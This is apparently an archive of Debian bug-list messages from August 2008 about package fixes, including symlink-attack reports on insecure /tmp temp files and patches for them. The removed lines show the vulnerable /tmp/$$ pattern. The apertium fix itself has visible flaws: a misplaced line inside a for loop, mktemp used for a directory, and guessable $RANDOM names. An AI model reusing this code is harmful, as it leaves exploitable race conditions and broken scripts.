I experienced the same problem with my notebook. Using Etch Stable (installed from the CD), then upgrading to Lenny (to get my Intel GMA965 chipset working well with 3D). I've got a 32 bits Intel architecture (CPU = pentium M) I solved the problem by : - editing my /etc/apt/sources.list to switch back to etch - apt-get remove docbook-xml (complains many times about update-xmlcatalog: error: entity not registered ) - apt-get update - apt-get install docbook-xml - editing /etc/apt/sources.list to update to lenny - apt-get update - apt-get dist-upgrade That did it ;-) Hope that helps. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#481134: Please hint poppler-data for lenny inclusion
Hideki Yamane a écrit : So I and other Japanese Debian developer/maintainer/package maintainer/ users want poppler-data package to there, the CJK languages-desktop tasks in tasksel. Please consider that. The easiest way to have this to happen is by sending a wishlist bug report against tasksel. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496640: marked as done (anon-proxy: fails to install if /etc/environment is empty)
Your message dated Wed, 27 Aug 2008 13:32:03 + with message-id [EMAIL PROTECTED] and subject line Bug#496640: fixed in anon-proxy 00.05.38+20080710-2 has caused the Debian Bug report #496640, regarding anon-proxy: fails to install if /etc/environment is empty to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 496640: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496640 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: anon-proxy Version: 00.05.38+20080710-1 Severity: serious Justification: Policy 6.1. If /etc/environment is empty, installation or removing/purging of anon-proxy fail. The reason is the grep call in line 50 of anon-proxy.postinst fails, if /etc/environment is empty. The same applies to line 29 of anon-proxy.prerm As a result aptitude won't install/remove/upgrade any other package, making the system unusable/breaking security updates, etc. Workaround: create/remove/edit /etc/environment to be either a file with at least a 'space' in it or to be removed. Johannes -- System Information: Debian Release: lenny/sid APT prefers testing APT policy: (500, 'testing') Architecture: i386 (x86_64) Kernel: Linux 2.6.25-2-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages anon-proxy depends on: ii adduser 3.110 add and remove users and groups ii debconf [debconf-2.0] 1.5.22 Debian configuration management sy ii libc6 2.7-13 GNU C Library: Shared libraries ii libgcc1 1:4.3.1-2 GCC support library ii libssl0.9.8 0.9.8g-13 SSL shared libraries ii libstdc++64.3.1-2The GNU Standard C++ Library v3 ii libxerces-c28 2.8.0-3validating XML parser library for anon-proxy recommends no packages. Versions of packages anon-proxy suggests: pn mixmaster none (no description available) pn mixminion none (no description available) ii tor 0.2.0.30-2 anonymizing overlay network for TC -- debconf information: * anon-proxy/environment: true ---End Message--- ---BeginMessage--- Source: anon-proxy Source-Version: 00.05.38+20080710-2 We believe that the bug you reported is fixed in the latest version of anon-proxy, which is due to be installed in the Debian FTP archive: anon-proxy_00.05.38+20080710-2.diff.gz to pool/main/a/anon-proxy/anon-proxy_00.05.38+20080710-2.diff.gz anon-proxy_00.05.38+20080710-2.dsc to pool/main/a/anon-proxy/anon-proxy_00.05.38+20080710-2.dsc anon-proxy_00.05.38+20080710-2_i386.deb to pool/main/a/anon-proxy/anon-proxy_00.05.38+20080710-2_i386.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. David Spreen [EMAIL PROTECTED] (supplier of updated anon-proxy package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 27 Aug 2008 06:05:40 -0700 Source: anon-proxy Binary: anon-proxy Architecture: source i386 Version: 00.05.38+20080710-2 Distribution: unstable Urgency: low Maintainer: David Spreen [EMAIL PROTECTED] Changed-By: David Spreen [EMAIL PROTECTED] Description: anon-proxy - Proxy to surf the web anonymously Closes: 491932 492613 496640 Changes: anon-proxy (00.05.38+20080710-2) unstable; urgency=low . * Translation updates and rc-fix release for Lenny. * Updated Finnish debconf translation (Closes: #492613). * Updated Swedish debconf translation (Closes: #491932). * debian/postinst debian/prerm: - Don't ever let grep call return 1 to prevent package from installing, upgrading or purging due to empty /etc/environment file. Fixes RC bug. (Closes: 496640). Checksums-Sha1: 5b66ffbfc3a37425e9678ecc0cc297d139af18c6 1173 anon-proxy_00.05.38+20080710-2.dsc 7b71079b1a35c7ce15e596061131f5dd9ec5238a 22435 anon-proxy_00.05.38+20080710-2.diff.gz 589466e39566b80a7f370d38addac23621886b46 128284 anon-proxy_00.05.38+20080710-2_i386.deb Checksums-Sha256: da50f7b70a364efe59fe8ef9af904e6e28795e8ff63f92ef12812841bb42700b 1173
Processed: Re: The possibility of attack with the help of symlinks in some Debian packages
Processing commands for [EMAIL PROTECTED]: tags 496395 confirmed patch Bug#496395: The possibility of attack with the help of symlinks in some Debian packages Tags were: security Tags added: confirmed, patch thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#481134: Please hint poppler-data for lenny inclusion
在 2008-08-27三的 15:58 +0200,Christian Perrier写道: Hideki Yamane a écrit : So I and other Japanese Debian developer/maintainer/package maintainer/ users want poppler-data package to there, the CJK languages-desktop tasks in tasksel. Please consider that. The easiest way to have this to happen is by sending a wishlist bug report against tasksel. Though I'm not a maintainer of tasksel stuff, I think it's valid to suggest the same to be done for Chinese(both simplified and traditional) and Korean tasks as well, so that we save some bug number count :) -- Regards, Deng Xiyue, a.k.a. manphiz signature.asc Description: 这是信件的数字签 名部分
Bug#496001: marked as done (python-coverage: Missing Depends: python-pkg-resources)
Your message dated Wed, 27 Aug 2008 13:32:06 + with message-id [EMAIL PROTECTED] and subject line Bug#496001: fixed in python-coverage 2.80-2 has caused the Debian Bug report #496001, regarding python-coverage: Missing Depends: python-pkg-resources to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 496001: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496001 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: python-coverage Version: 2.80-1 Severity: serious It appears python-coverage should depend on python-pkg-resources: $ python-coverage Traceback (most recent call last): File /usr/bin/python-coverage, line 5, in module from pkg_resources import load_entry_point ImportError: No module named pkg_resources $ python-coverage -e Traceback (most recent call last): File /usr/bin/python-coverage, line 5, in module from pkg_resources import load_entry_point ImportError: No module named pkg_resources $ apt-file search pkg_resources python-pkg-resources: /usr/share/doc/python-pkg-resources/pkg_resources.txt.gz python-pkg-resources: /usr/share/pyshared/pkg_resources.py python-wxgtk2.8: /usr/lib/python2.4/site-packages/wx-2.8-gtk2-unicode/wx/tools/Editra/src/extern/pkg_resources.py python-wxgtk2.8: /usr/lib/python2.5/site-packages/wx-2.8-gtk2-unicode/wx/tools/Editra/src/extern/pkg_resources.py After installing python-pkg-resoures, I get no error message at least running the above commands. Sami -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing') Architecture: amd64 (x86_64) Kernel: Linux 2.6.26.2 (SMP w/4 CPU cores; PREEMPT) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages python-coverage depends on: ii python2.5.2-2An interactive high-level object-o ii python-central0.6.8 register and build utility for Pyt python-coverage recommends no packages. python-coverage suggests no packages. -- no debconf information ---End Message--- ---BeginMessage--- Source: python-coverage Source-Version: 2.80-2 We believe that the bug you reported is fixed in the latest version of python-coverage, which is due to be installed in the Debian FTP archive: python-coverage_2.80-2.diff.gz to pool/main/p/python-coverage/python-coverage_2.80-2.diff.gz python-coverage_2.80-2.dsc to pool/main/p/python-coverage/python-coverage_2.80-2.dsc python-coverage_2.80-2_all.deb to pool/main/p/python-coverage/python-coverage_2.80-2_all.deb python-coverage_2.80.orig.tar.gz to pool/main/p/python-coverage/python-coverage_2.80.orig.tar.gz A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Ben Finney [EMAIL PROTECTED] (supplier of updated python-coverage package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Fri, 22 Aug 2008 10:02:53 +1000 Source: python-coverage Binary: python-coverage Architecture: source all Version: 2.80-2 Distribution: unstable Urgency: medium Maintainer: Lars Wirzenius [EMAIL PROTECTED] Changed-By: Ben Finney [EMAIL PROTECTED] Description: python-coverage - code coverage tool for Python Closes: 496001 Changes: python-coverage (2.80-2) unstable; urgency=medium . [ Ben Finney ] * debian/control + Fix missing Depends: python-pkg-resources. Thanks to Sami Liedes for the bug report. (Closes: bug#496001) Checksums-Sha1: f4211cabf5194b3257571cfcbd80a60fc5b032f3 1224 python-coverage_2.80-2.dsc 182ce686920567fa5f3a44b665d7f66fcc86cf58 13751 python-coverage_2.80.orig.tar.gz dbbec3510cbbd6ea552a164f0132d63e6b968400 3891 python-coverage_2.80-2.diff.gz 8dafd31b6d2c3bc581adf69d495f2d04e7b8573c 19262 python-coverage_2.80-2_all.deb Checksums-Sha256: 15c917e64ff5d79cc6a29176512eaf36b2e7add0b65455c3155298cc4d7aafd7 1224 python-coverage_2.80-2.dsc a212da669fa5ec813479555e079bdde0d6d016daa9fe253528b0a4a579dacb22 13751 python-coverage_2.80.orig.tar.gz
Bug#496395: The possibility of attack with the help of symlinks in some Debian packages
tags 496395 confirmed patch
thanks
Dmitry E. Oboukhov wrote:
Package: apertium
Severity: grave
Hi, maintainer!
This message about the error concerns a few packages at once. I've
tested all the packages (for Lenny) on my Debian mirror. All scripts
of packages (marked as executable) were tested.
Two patches fixing these issues are attached.
Cheers,
Moritz
--- apertium-3.0.7+1.orig/apertium/Makefile.in 2008-03-31 06:22:55.0 +0200
+++ apertium-3.0.7+1/apertium/Makefile.in 2008-08-23 19:37:13.0 +0200
@@ -1148,25 +1148,29 @@
@echo Creating apertium-gen-deformat script
@echo #!$(BASH) $@
@cat deformat-header.sh $@
+ @echo TMP_DEFORMAT=\`mktemp\` $@
+ @echo TMP_LEX=\`mktemp\` $@
@echo $(XMLLINT) --dtdvalid $(apertiumdir)/format.dtd --noout \$$FILE1 \\ $@
@if [ `basename $(XSLTPROC)` == xsltproc ]; \
- then echo $(XSLTPROC) --stringparam mode \$$MODE $(apertiumdir)/deformat.xsl \$$FILE1 /tmp/\$$\$$.deformat.l \\; \
- else echo $(XSLTPROC) $(apertiumdir)/deformat.xsl \$$FILE1 $$mode=\$$MODE\ /tmp/\$$\$$.deformat.l \\; \
+ then echo $(XSLTPROC) --stringparam mode \$$MODE $(apertiumdir)/deformat.xsl \$$FILE1 \$$TMP_DEFORMAT \\; \
+ else echo $(XSLTPROC) $(apertiumdir)/deformat.xsl \$$FILE1 $$mode=\$$MODE\ \$$TMP_DEFORMAT \\; \
fi $@
- @echo $(FLEX) \$$FLEXOPTS -o/tmp/\$$\$$.lex.cc /tmp/\$$\$$.deformat.l \\ $@
- @echo $(CXX) $(CXXFLAGS) -w $(APERTIUM_CFLAGS) -I $(apertiuminclude) -o \$$FILE2 /tmp/\$$\$$.lex.cc \\ $@
- @echo rm /tmp/\$$\$$.deformat.l /tmp/\$$\$$.lex.cc $@
+ @echo $(FLEX) \$$FLEXOPTS -o \$$TMP_LEX \$$TMP_DEFORMAT \\ $@
+ @echo $(CXX) $(CXXFLAGS) -w $(APERTIUM_CFLAGS) -I $(apertiuminclude) -o \$$FILE2 \$$TMP_LEX \\ $@
+ @echo rm \$$TMP_DEFORMAT \$$TMP_LEX $@
@chmod a+x $@
apertium-gen-reformat: Makefile.am gen-header.sh
@echo Creating apertium-gen-reformat script
@echo #!$(BASH) $@
@cat gen-header.sh $@
+ @echo TMP_REFORMAT=\`mktemp\` $@
+ @echo TMP_LEX=\`mktemp\` $@
@echo $(XMLLINT) --dtdvalid $(apertiumdir)/format.dtd --noout \$$FILE1 \\ $@
- @echo $(XSLTPROC) $(apertiumdir)/reformat.xsl \$$FILE1 /tmp/\$$\$$.reformat.l \\ $@
- @echo $(FLEX) \$$FLEXOPTS -o/tmp/\$$\$$.lex.cc /tmp/\$$\$$.reformat.l \\ $@
- @echo $(CXX) $(CXXFLAGS) -w $(APERTIUM_CFLAGS) -I $(apertiuminclude) -o \$$FILE2 /tmp/\$$\$$.lex.cc \\ $@
- @echo rm /tmp/\$$\$$.reformat.l /tmp/\$$\$$.lex.cc $@
+ @echo $(XSLTPROC) $(apertiumdir)/reformat.xsl \$$FILE1 \$$TMP_REFORMAT \\ $@
+ @echo $(FLEX) \$$FLEXOPTS -o \$$TMP_LEX \$$TMP_REFORMAT \\ $@
+ @echo $(CXX) $(CXXFLAGS) -w $(APERTIUM_CFLAGS) -I $(apertiuminclude) -o \$$FILE2 \$$TMP_LEX \\ $@
+ @echo rm \$$TMP_REFORMAT \$$TMP_LEX $@
@chmod a+x $@
apertium-gen-modes: Makefile.am modes-header.sh
--- apertium-3.0.7+1.orig/apertium/apertium-header.sh 2008-02-05 07:49:07.0 +0100
+++ apertium-3.0.7+1/apertium/apertium-header.sh 2008-08-23 21:41:12.0 +0200
@@ -38,17 +38,17 @@
function translate_odt
{
- INPUT_TMPDIR=/tmp/$$odtdir
+ INPUT_TMPDIR=`mktemp`
locale_utf8
test_zip
if [[ $FICHERO == ]]
- then FICHERO=/tmp/$$odtorig
+ then FICHERO=`mktemp`
cat $FICHERO
BORRAFICHERO=true
fi
- OTRASALIDA=/tmp/$$odtsalida.zip
+ OTRASALIDA=/tmp/$RANDOM-$RANDOM-$RANDOM-odtsalida.zip
unzip -q -o -d $INPUT_TMPDIR $FICHERO
find $INPUT_TMPDIR | grep content\\\.xml |\
@@ -78,17 +78,17 @@
function translate_docx
{
- INPUT_TMPDIR=/tmp/$$docxdir
+ INPUT_TMPDIR=`mktemp`
locale_utf8
test_zip
if [[ $FICHERO == ]]
- then FICHERO=/tmp/$$docxorig
+ then FICHERO=`mktemp`
cat $FICHERO
BORRAFICHERO=true
fi
- OTRASALIDA=/tmp/$$docxsalida.zip
+ OTRASALIDA=/tmp/$RANDOM-$RANDOM-$RANDOM-docxsalida.zip
if [[ $UWORDS == no ]]
then OPCIONU=-u;
@@ -98,8 +98,9 @@
unzip -q -o -d $INPUT_TMPDIR $FICHERO
for i in $(find $INPUT_TMPDIR|grep xlsx$);
- do $APERTIUM_PATH/apertium -f xlsx -d $DIRECTORY $OPCIONU $PREFIJO $i /tmp/$$xlsxembed;
- mv /tmp/$$xlsxembed $i;
+ TMP_XLSXEMBED=`mktemp`
+ do $APERTIUM_PATH/apertium -f xlsx -d $DIRECTORY $OPCIONU $PREFIJO $i $TMP_XLSXEMBED;
+ mv $TMP_XLSXEMBED $i;
done;
find $INPUT_TMPDIR | grep xml |\
@@ -130,17 +131,17 @@
function translate_xlsx
{
- INPUT_TMPDIR=/tmp/$$xlsxdir
+ INPUT_TMPDIR=`mktemp`
locale_utf8
test_zip
if [[ $FICHERO == ]]
- then FICHERO=/tmp/$$xlsxorig
+ then FICHERO=`mktemp`
cat $FICHERO
BORRAFICHERO=true
fi
- OTRASALIDA=/tmp/$$xslxsalida.zip
+ OTRASALIDA=/tmp/$RANDOM-$RANDOM-$RANDOM-xslxsalida.zip
unzip -q -o -d $INPUT_TMPDIR $FICHERO
find $INPUT_TMPDIR | grep sharedStrings.xml |\
Processed: tagging 417142
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.10.29~bpo40+1 tags 417142 pending Bug#417142: depends on non-essential package debconf in postrm Tags were: patch etch-ignore Tags added: pending End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: The possibility of attack with the help of symlinks in some Debian packages
Processing commands for [EMAIL PROTECTED]: severity 496402 normal Bug#496402: The possibility of attack with the help of symlinks in some Debian packages Severity set to `normal' from `grave' thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#417142: NMU for websvn
Hi Pierre,
This RC bug has now been open for two weeks. I'm uploading an NMU to the
delayed-5 queue according to the attached patch. I hope this helps to keep
websvn in good shape in lenny.
cheers,
Thijs
diff -u websvn-2.0/debian/changelog websvn-2.0/debian/changelog
--- websvn-2.0/debian/changelog
+++ websvn-2.0/debian/changelog
@@ -1,3 +1,10 @@
+websvn (2.0-2.1) unstable; urgency=high
+
+ * Non-maintainer upload.
+ * Fix unconditional use of debconf in postrm (Closes: #417142).
+
+ -- Thijs Kinkhorst [EMAIL PROTECTED] Wed, 27 Aug 2008 15:56:07 +0200
+
websvn (2.0-2) unstable; urgency=low
* Upload to unstable
diff -u websvn-2.0/debian/postrm websvn-2.0/debian/postrm
--- websvn-2.0/debian/postrm
+++ websvn-2.0/debian/postrm
@@ -1,10 +1,12 @@
#! /bin/sh
-# post remove script for wzdftpd
+# post remove script for websvn
set -e
-. /usr/share/debconf/confmodule
-db_version 2.0 || [ $? -lt 30 ]
+if [ -f /usr/share/debconf/confmodule ]; then
+ . /usr/share/debconf/confmodule
+ db_version 2.0 || [ $? -lt 30 ]
+fi
case $1 in
purge)
@@ -14,22 +16,24 @@
ucf -p /etc/websvn/svn_deb_conf.inc || true
rm -rf /var/cache/websvn/
- db_get websvn/webservers
- webservers=$RET
- restart=
-
- for webserver in $webservers; do
- webserver=${webserver%,}
-
- case $webserver in
-apache|apache-perl|apache-ssl|apache2)
-rm -f /etc/$webserver/conf.d/websvn
-test -x /usr/sbin/$webserver || continue
-restart=$restart $webserver
- ;;
- esac
- done
+ if [ -f /usr/share/debconf/confmodule ]; then
+ db_get websvn/webservers
+ webservers=$RET
+ restart=
+
+ for webserver in $webservers; do
+webserver=${webserver%,}
+
+case $webserver in
+ apache|apache-perl|apache-ssl|apache2)
+ rm -f /etc/$webserver/conf.d/websvn
+ test -x /usr/sbin/$webserver || continue
+ restart=$restart $webserver
+;;
+esac
+ done
+ fi
;;
esac
@@ -47,7 +51,9 @@
#DEBHELPER#
-db_stop
+if [ -f /usr/share/debconf/confmodule ]; then
+ db_stop
+fi
exit 0
pgpeSFffM82rv.pgp
Description: PGP signature
Bug#496402: The possibility of attack with the help of symlinks in some Debian packages
severity 496402 normal thanks On Sun, Aug 24, 2008 at 10:05:29PM +0400, Dmitry E. Oboukhov wrote: Package: aegis Severity: grave Hi, maintainer! This message about the error concerns a few packages at once. I've tested all the packages (for Lenny) on my Debian mirror. All scripts of packages (marked as executable) were tested. The affected scripts are only examples, lowering severity. Cheers, Moritz -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#483337: marked as done (mt-daapd: FTBFS: scan-mpc.c:73: error: too many arguments to function 'taglib_tag_free_strings')
Your message dated Wed, 27 Aug 2008 14:02:03 + with message-id [EMAIL PROTECTED] and subject line Bug#483337: fixed in mt-daapd 0.9~r1696-1.4 has caused the Debian Bug report #483337, regarding mt-daapd: FTBFS: scan-mpc.c:73: error: too many arguments to function 'taglib_tag_free_strings' to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 483337: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=483337 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: mt-daapd Version: 0.9~r1696-1.3 Severity: serious User: [EMAIL PROTECTED] Usertags: qa-ftbfs-20080527 qa-ftbfs Justification: FTBFS on i386 Hi, During a rebuild of all packages in sid, your package failed to build on i386. Relevant part: if i486-linux-gnu-gcc -DHAVE_CONFIG_H -I. -I. -I.. -g -Wall -DWITH_HOWL -DOGGVORBIS -DFLAC -DMUSEPACK -DHAVE_SQL -DHOST='i486-pc-linux-gnu' -DNOT_HAVE_SA_LEN -DUSES_NETLINK -DHAVE_LINUX -I/usr/include/avahi-compat-howl -I/usr/include/ffmpeg -Wall -g -DHAVE_VA_COPY -O2 -MT scan-mpc.o -MD -MP -MF .deps/scan-mpc.Tpo -c -o scan-mpc.o scan-mpc.c; \ then mv -f .deps/scan-mpc.Tpo .deps/scan-mpc.Po; else rm -f .deps/scan-mpc.Tpo; exit 1; fi scan-mpc.c: In function 'scan_get_mpcinfo': scan-mpc.c:73: error: too many arguments to function 'taglib_tag_free_strings' scan-mpc.c:79: error: too many arguments to function 'taglib_tag_free_strings' scan-mpc.c:85: error: too many arguments to function 'taglib_tag_free_strings' scan-mpc.c:91: error: too many arguments to function 'taglib_tag_free_strings' scan-mpc.c:97: error: too many arguments to function 'taglib_tag_free_strings' scan-mpc.c:46: warning: unused variable 'f' make[4]: *** [scan-mpc.o] Error 1 The full build log is available from: http://people.debian.org/~lucas/logs/2008/05/27 This rebuild was done with gcc 4.3 instead of gcc 4.2, because gcc 4.3 is now the default on most architectures (even if it's not the case on i386 yet). Consequently, many failures are caused by the switch to gcc 4.3. If you determine that this failure is caused by gcc 4.3, feel free to downgrade this bug to 'important' if your package is only built on i386, and this bug is specific to gcc 4.3 (i.e the package builds fine with gcc 4.2). A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! About the archive rebuild: The rebuild was done on about 50 AMD64 nodes of the Grid'5000 platform, using a clean chroot containing a sid i386 environment. Internet was not accessible from the build systems. -- | Lucas Nussbaum | [EMAIL PROTECTED] http://www.lucas-nussbaum.net/ | | jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F | ---End Message--- ---BeginMessage--- Source: mt-daapd Source-Version: 0.9~r1696-1.4 We believe that the bug you reported is fixed in the latest version of mt-daapd, which is due to be installed in the Debian FTP archive: mt-daapd_0.9~r1696-1.4.diff.gz to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4.diff.gz mt-daapd_0.9~r1696-1.4.dsc to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4.dsc mt-daapd_0.9~r1696-1.4_amd64.deb to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Nico Golde [EMAIL PROTECTED] (supplier of updated mt-daapd package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 27 Aug 2008 14:53:45 +0200 Source: mt-daapd Binary: mt-daapd Architecture: source amd64 Version: 0.9~r1696-1.4 Distribution: unstable Urgency: low Maintainer: Joshua Kwan [EMAIL PROTECTED] Changed-By: Nico Golde [EMAIL PROTECTED] Description: mt-daapd - iTunes-compatible DAAP server Closes: 483337 496217 Changes: mt-daapd (0.9~r1696-1.4) unstable; urgency=low . * Fix authentication upstream patch checking for a wrong return value (03_fix-authentication.dpatch; Closes: #496217). * Fix taglib api calls (04_taglib_api_calls.dpatch; Closes: #483337) Checksums-Sha1: a481b039be558819f8bc140717368c7ff765badb 1161 mt-daapd_0.9~r1696-1.4.dsc 6fb99300b305f8016f5f27af32281620b7bb8ee0 20572
Bug#496371: [Pkg-lustre-maintainers] Bug#496371: The possibility of attack with the help of symlinks in some Debian packages
This one time, at band camp, Patrick Winnertz said: Thanks Stephen, tmpfile=$(mktemp /tmp/iozone.XX) I know that this way it is possible. But as the user should find the log afterwards I would prefer to use /tmp/iozone.log or something else, nothing random. But as I wrote in my previous email I don't have a idea how to fix this without using mktemp. You can echo what file to look at. -- - | ,''`.Stephen Gran | | : :' :[EMAIL PROTECTED] | | `. `'Debian user, admin, and developer | |`- http://www.debian.org | - signature.asc Description: Digital signature
Processed: severity of 495968 is grave
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.10.35 severity 495968 grave Bug#495968: [gpicview] security RC bugs Severity set to `grave' from `grave' End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: severity of 495968 is grave
Processing commands for [EMAIL PROTECTED]: # Automatically generated email from bts, devscripts version 2.10.35 severity 495968 grave Bug#495968: [gpicview] security RC bugs Severity set to `grave' from `serious' End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#496217: marked as done (mt-daapd: admin page password always fails)
Your message dated Wed, 27 Aug 2008 14:02:03 + with message-id [EMAIL PROTECTED] and subject line Bug#496217: fixed in mt-daapd 0.9~r1696-1.4 has caused the Debian Bug report #496217, regarding mt-daapd: admin page password always fails to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 496217: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496217 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems ---BeginMessage--- Package: mt-daapd Version: 0.2.4+r1376-1.1+etch1 Severity: grave Justification: renders package unusable After upgrading to the latest version of mt-daapd in stable, the admin page does not accept the password that's in the config file. -- System Information: Debian Release: 4.0 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-4-486 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages mt-daapd depends on: ii adduser3.102 Add and remove users and groups ii avahi-daemon 0.6.16-3etch1 Avahi mDNS/DNS-SD daemon ii libavahi-compat-howl0 0.6.16-3etch1 Avahi Howl compatibility library ii libavcodec0d 0.cvs20060823-8 ffmpeg codec library ii libavformat0d 0.cvs20060823-8 ffmpeg file format library ii libc6 2.3.6.ds1-13etch7 GNU C Library: Shared libraries ii libflac7 1.1.2-8 Free Lossless Audio Codec - runtim ii libid3tag0 0.15.1b-10ID3 tag reading library from the M ii libogg01.1.3-2 Ogg Bitstream Library ii libsqlite3-0 3.3.8-1.1 SQLite 3 shared library ii libtag1c2a 1.4-4 TagLib Audio Meta-Data Library ii libtagc0 1.4-4 TagLib Audio Meta-Data Library (C ii libvorbis0a1.1.2.dfsg-1.4The Vorbis General Audio Compressi ii libvorbisfile3 1.1.2.dfsg-1.4The Vorbis General Audio Compressi ii zlib1g 1:1.2.3-13compression library - runtime mt-daapd recommends no packages. -- no debconf information ---End Message--- ---BeginMessage--- Source: mt-daapd Source-Version: 0.9~r1696-1.4 We believe that the bug you reported is fixed in the latest version of mt-daapd, which is due to be installed in the Debian FTP archive: mt-daapd_0.9~r1696-1.4.diff.gz to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4.diff.gz mt-daapd_0.9~r1696-1.4.dsc to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4.dsc mt-daapd_0.9~r1696-1.4_amd64.deb to pool/main/m/mt-daapd/mt-daapd_0.9~r1696-1.4_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Nico Golde [EMAIL PROTECTED] (supplier of updated mt-daapd package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 27 Aug 2008 14:53:45 +0200 Source: mt-daapd Binary: mt-daapd Architecture: source amd64 Version: 0.9~r1696-1.4 Distribution: unstable Urgency: low Maintainer: Joshua Kwan [EMAIL PROTECTED] Changed-By: Nico Golde [EMAIL PROTECTED] Description: mt-daapd - iTunes-compatible DAAP server Closes: 483337 496217 Changes: mt-daapd (0.9~r1696-1.4) unstable; urgency=low . * Fix authentication upstream patch checking for a wrong return value (03_fix-authentication.dpatch; Closes: #496217). * Fix taglib api calls (04_taglib_api_calls.dpatch; Closes: #483337) Checksums-Sha1: a481b039be558819f8bc140717368c7ff765badb 1161 mt-daapd_0.9~r1696-1.4.dsc 6fb99300b305f8016f5f27af32281620b7bb8ee0 20572 mt-daapd_0.9~r1696-1.4.diff.gz 